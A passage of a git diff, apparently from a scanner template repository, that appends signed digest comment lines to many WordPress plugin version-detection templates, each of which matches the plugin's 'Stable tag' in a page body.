4b0a00483046022100ce751f1fb1f5edd2bb78cccb2ace7e77b88c4668e607809aba39542990154d1a022100dd3cd88df50350b1b3bd728474011f3a0627e93296a753660c03c62f991eeb0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..260d86ce8d 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043022037542fd370f6a7a14b93fce3808858cb727adf46aea74d4cb1b0fd4d33883c92021f60232e5ac7395ea691abbe651a04071b2ab6e32d01682080cd4e74886c0459:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..d58b076cf7 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba79906c7a57f9dda85d29de2f60d49c17d9d0871c7b12cb16892bfa90f6124402205554759bb55303ca5c38abea0eb13ba9aef4d86c84add24406749b888edfad17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..66ec52f9ce 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204788617abb3fc0b0eb069f763c0d345d3c08a137b7d0d3c0f6e58072e7e5dbbf022100a751237a6c97658f45b541b02fe8226a478cfbf87b9e9dd53264ef85789a313b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..e7e7b51d24 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f153e96c7176289a5aed442ff76e5e25059b631797f2c4f97668fbe1f8842b0f0220105bc8f6586649d8a33f81a610eaae0d05436bbdce9cfa52d305b9cf865900dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..d78c1cbfa5 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220560d27d3020cca490176766815b51ea4963358f1d9616047a5c03b32219c5553022045c0f73c33adad5feff529cdae3ad2885b1d845c5500e4323005ed9c2462423a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..e2db00b5c9 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049345a19f596ced7a941049b51d736b62c4e3ef8db41c917fdcc4d93cc4592dd022100a092b986fc9875c5ecd70132cd145bfc1aaa775b6a92ba411211da7df789c526:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..f2af2d22ee 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207100f60b8e14f9473fcc3b5420643f70dabe56c1dbac5c4876ad3a5122a64f7c0220091f6d1ddcbf4399e8e90ea22774d6683b5c91d41479373fc73b15bb157bf430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..bf577986fb 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100959406bf7400ed0fb92cfa15d4f61f25749beacd29b9d726d0634a7b65c8eb1d0220158b6674172b8c6a6cfe11a24d8b4ed3e210044bc71f7b8936683b4ef7c946f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..969283575d 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203702e56aa4bb871a382a5ef2060fb39ae162f124d0d2c789cfdc7c1b198c522302201135453952209425027a72a727988e058ba830fa4332f48f3855ffb6702c38de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..005e702e67 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203e612d4422b637bbe85da7d69290d9aa2333a1be2347d84f624937c7f79093f2022100c90796d6d816ac368e07bec330afc271afed31ecdedee71099df4c82fd1223b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..82c3519c9e 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef5923e8da5d782d52eb974b104c76780b60c47d181fabafb209a3fcfed40dfd02201f10548f633a740fff507c2616b7e212a190ad66bcddc21849dce32fa7b5f33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..562ef795ac 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c695c832a868cbe72dcc82923ba74657f55aa7ad0786000120dde442ed8e258022100cfded329340b7c2222069c916b1a178d35feeb4d0c104a02fbdd3bde04858a7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..91be77ad83 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b617651eb78c0b3dff70edf912d4fd07f296e9a5b91551b0cf022fd3222029860221009f491a4e440d57b021e897b1ea8d02683eec38910f9828cf68a40db26b802c83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..f73a5ede60 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce7f5749050cd139464bfa8f5498b0f9340c44de2391d47d3ce196a7a14a3aa8022100d99a7119c53691eb2c2bac7fcdf2740be683eebac3c67dccdcde20b7137ccc00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..3a5202fe57 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a29e03526612147d5de1447a8a0d3ccee414f48edcaebba126d2e8cda68ad27022100c4632d5f277a0427276b0c1ba26c1727570e4f7467d8a8b8879843985c81f866:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..611ea6eda4 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089c305c27584af7d6a9e516db1c00aa4b9ca4f93e5f2e38abf100223339c46e602200ff0dc892704bf29d73a3e39efb6f5f2591756bd9af80ca08a196727c05eec38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..0dbfa4f513 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fdfe5517592d988c0174c9ed1237aa711bc52d7b2e67d53c6b1e9e03d8c6b5b022100d21b77e1520d7751aa80d6f6377f892f0062ea74ddf3effe33bb1f1c427c853a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..e9bd6e0d32 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022011d8ad271ff5e80a74f4f6df8dc0fef2ed657b87cc13493046ddd38f7027287e0221009a9ccc25537a392a838f7bcf4662640c0c44471b99676b7fbb80e3aea1f3ee61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..9c48339eaf 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e003466dd4b8a0fdcbd849b5b4192b3773269d6a26567b0f5bbff46a6727225a022055b9ddab3768587a287436d798b2e2e2c3f708770482d403f672a89afd22af3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..1eb7f725fd 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da877dd45fc3c9beae4554efcd0ed8b9c1d93a129eefdbf92bda73ac950b8bf6022100b52b075ac483cc2ce86269ab03831221fbd64e9e0099dc4a2094217a9b7c6daa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..2a4bc800ac 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202deadacf1546dc1491904d713a2fc8566209b23316a777d8188baa6b4ef76189022100e903e4a773e2ada4f298d861854d01a997cb933fceabeb30e7b6f77f1646961f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..7a4a705fac 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f027d30d29e5e6fcdf4e60da2032cbe8a1858f8b1f7d897decc465c16f91455f02207ed86ec68a1da071d13963d05a94cacc1ac8898abf0b65daf6348a04b89f478d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..e4c58ee6dd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054d3d7d789702d7724007303f480616e23e162d9b231cde99c39c879236feecf0220379fdb01748cf0df4e377deea5814975fc9f10f97ac16ea03ed2ff2e5c7f0b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..3717c4f519 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bcaed14c3ce2abc52d72126d12602f3c6ba0f4b9d6537ba3a30384801e44ddd102206d74f81efc4d035514d94daf27fba2f77b7db72546bb144d51f7a9a51a10e10c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..4b0fcd6632 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202445ee6834c1a10c2e4b5406aaed70d6b5204b8ced5b014e1f063cddf827419a022100a6408caa6e6d5a4f3df4d0e322a11cb96e6c61e7c6b0fc00acc82c59346532e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..592d949843 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c5ddf64553dc9a1bcbe8d2862af4a67411c6d1e0ab76203b5d917a1da57f4fd02200893190b3af0bdb388d6c34633aca15dfd7cc6b333de629875a74adb7d6a1900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..89801f1719 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098c4bc1e6649186b7d58bee8b44838d5dc0d13a16c2aebd76fa5cef32eff1219022100e54bed3638124a1e0c9cee5ffa051f8c9ec8578f2b2d8ca35e77f8c899fa4bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..eb3a255d13 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009be3a2e50f2f7d817138811eaece96ffa812e0f7d4d1ae0a197bcfb9386638f9022100eeafde8f08e9f02f836503b80c14c0715eb82f27addeee18d006b7376e454a7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..953b4701aa 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0c5250b290fab0bb1037f04cb3ea850503f24099b57dd319ffc4722dd8b8edc0221009fb5028b007afec46174b57616257a8a6bddf7c37ab0b66d724206c5f74478cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..aaaf2c14ba 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b64710284c7b4093f92de278848103515c98b3164cf81e421bfc966c123a362c022015a6f1345a8715cfe6724a5c78a7fb4a057e0b2fb41b71dd21db81f5f1fc4a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..835f222d21 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dca100dd3516691be50643447911830bf261b0ad1e289dfd55cb4bd5168128e30221009cdb7b09deab97f4b3492749eced8e908362368b77771048e571fa590a46ffa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..d9ab0cea26 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203dc1be1cf7b60b19373c8a9e0a080181a1dd8e764d53dafae862fb805fd4f4580221009c14b262bccf522b56ceaf43d77f63f0ca4b1787d58fb41eba94a4e32ff4cfb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..1ebf0859e6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5e8e07a621b1d656258da62e2d50de2b942e3a8715a33a11d658c37726c0405022045705679a049fae7dbf3229c8bc6a9ae8931eaceba4b32db76c33b8129abded5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..41072d886d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1595ad16d75f5530adcdcc3c55545e0775283d16f8ec66acfc1711a5d765ecf022100e0a85162a5e0d6017203504d2fa7f48a9a1faf039982b3e9489a388625f88e2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..6389a8bc57 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009ffa0331d6ccb94a46a1512588b862e740e480e9865547a5b8e2942b26923ba4022079d2dff5f7f0443511f3c6c4d3f6c44e45c2b049617fddbfc90c9bf8e5e0de08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..ac1e3db25c 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022052607f625c2a54d9e8c57f940c19f0a25f11dc0389ec42f2c66b42c74d060ae4022100f887b6b626509797b2e7ac36b03bb4800f1afa604cb824e014a906f5fca747ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..c24b5d21a0 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207fda854568dc0da78d351dd5aad3827c4a79c4d642900060aa02e348742dd039022019ed28adfb1dd50996bd06746ccffab9257ee521e51687d3598ee867f119d9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..6b1e815828 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220126d9477fd53b7b7e19df5e581b49747040d23bc91debd0eb3e9b81339deffd402205ff2a5a86df0d97536ef97594805ebfa56b98a28b48d3d1398b782e6e0572af2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..218e28ad75 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207cda32728e2c0c9a64c2cdc3010321fb0990a6046990ce29d61e852434d3fc4002207f2c0b47dcd1084b4165b20cb7aebbf3bde627937203cbfd4ed8709d11195bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..14d1c448e1 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e7ae0522c46939c910ffe5d7bb35f8ca8675923c44afe0e40f64e586e57b36f022078e6d6048c2c0004b61aab58d5bff7df5005c3845eeb017e8071c966f0b4994a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..32581070c5 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ee0450fd8c3494f057d7d0df96787f91ce9b2744c955d0ee31cba0543efaddc80221009c8d1e47a9ca37d610920ffec953f6400dd975997b1c41eaaa1fc7f9dfc9b9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..265aed919a 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d57492efb2dc71af930a89d81c86f0acb4c3e1ab5e5801833dc4b9cb247027f02207fa591bb0bf8ae067512038f601459fd579f6770602625638033cd6c897983a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..fc101d1666 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079c3a183f1bf5c90aee2883e58a56c529bac98e4780f85b95cae581b0a4a199802206c3a93e9191bd99656616e64dd19ad1988db0aee5e833a9df070377783384d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..e4d5ca5f58 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009de265a21fd1cfa2dbdea67cf122cd3d97aa97679d91e69bcce9cf759ff36a32022100bc388d718a4d1141764bd5218bab4f8cf44dc9c55275c934e1dc810a7d2c0150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..3eab30cc1e 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b7baf4608736fb9de48fa8d558a802aed6b7c1ff7e59cae95145c9e7cb9c5833022100eca4f5943fbb1719e90566271a220db6d2aeeb13c66ab6edd74ebbda98d7412c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..325b6b8f9a 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 